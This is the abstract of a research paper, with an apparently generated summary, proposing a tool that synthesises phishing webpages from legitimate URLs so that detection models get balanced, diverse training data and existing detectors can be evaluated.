Mitigating Bias in Machine Learning Models for Phishing Webpage Detection

Aditya Kulkarni,Vivek Balachandran,Dinil Mon Divakaran,Tamal Das
2024-01-16
Abstract:The widespread accessibility of the Internet has led to a surge in online fraudulent activities, underscoring the necessity of shielding users' sensitive information from cybercriminals. Phishing, a well-known cyberattack, revolves around the creation of phishing webpages and the dissemination of corresponding URLs, aiming to deceive users into sharing their sensitive information, often for identity theft or financial gain. Various techniques are available for preemptively categorizing zero-day phishing URLs by distilling unique attributes and constructing predictive models. However, these existing techniques encounter unresolved issues. This proposal delves into persistent challenges within phishing detection solutions, particularly concentrated on the preliminary phase of assembling comprehensive datasets, and proposes a potential solution in the form of a tool engineered to alleviate bias in ML models. Such a tool can generate phishing webpages for any given set of legitimate URLs, infusing randomly selected content and visual-based phishing features. Furthermore, we contend that the tool holds the potential to assess the efficacy of existing phishing detection solutions, especially those trained on confined datasets.
Cryptography and Security
What problem does this paper attempt to address?
The problem that this paper attempts to solve is the bias problem faced by existing machine learning (ML) models when detecting phishing web pages, especially in the initial stage of dataset construction. Specifically, the paper focuses on the following two main issues: 1. **Imbalanced Dataset**: In existing datasets used to train ML models, the number of legitimate URLs and phishing URLs is often disproportionate, resulting in bias in the model during classification. This bias makes the model more likely to predict the majority class (usually legitimate URLs), thereby reducing the recognition accuracy for new (zero - day) phishing attacks. 2. **Lack of Diversity**: Many researchers collect phishing samples from a single repository, which limits the diversity of the dataset and may cause the model to be unable to recognize different types of phishing features. To improve the accuracy of phishing detection, a dataset containing multiple phishing features is required, including URL and web page content features (such as logos, icons, HTML, CSS, and JS/PHP code, etc.). To solve these problems, the paper proposes a tool that can generate corresponding phishing web pages from a given set of legitimate URLs and randomly add content and visual - based phishing features. Through this method, the generated dataset can be balanced between legitimate and phishing web pages and has higher diversity. In addition, this tool can also be used to evaluate the effectiveness of existing phishing detection solutions, especially those models trained on limited datasets. ### Specific Problem Description - **Imbalanced Dataset**: When trained with an imbalanced dataset, the ML model will be biased towards the class with a larger number (usually legitimate URLs), thereby reducing the classification accuracy for the minority class (phishing URLs). \[ \text{Imbalanced Dataset} \to \text{Bias in Model} \to \text{Reduced Accuracy for Minority Class (Phishing URLs)} \] - **Lack of Diversity**: Phishing samples obtained from a single repository may not cover all types of phishing features, resulting in poor performance of the model when encountering new types of phishing attacks. ### Solution Overview The tool proposed in the paper generates phishing web pages through the following steps: 1. **Input**: A legitimate URL and a set of phishing features ($k$). 2. **Processing**: - Visit the legitimate URL and download its source code. - Randomly select and add diverse content and visual - based phishing features to the web page. 3. **Output**: Generate a phishing web page with $k$ phishing features embedded. In this way, the generated dataset not only maintains the balance between legitimate and phishing web pages but also increases the diversity of the dataset, thereby improving the accuracy of ML models in detecting new phishing attacks. ### Conclusion and Future Outlook This research delves into the ongoing challenges in phishing detection solutions, especially in the basic stage of dataset construction. The proposed tool alleviates dataset - related problems by generating phishing web pages, providing new ideas and methods for future phishing detection research. In addition, this tool can also be used to evaluate the effectiveness of existing phishing detection solutions, especially for those models trained on limited datasets.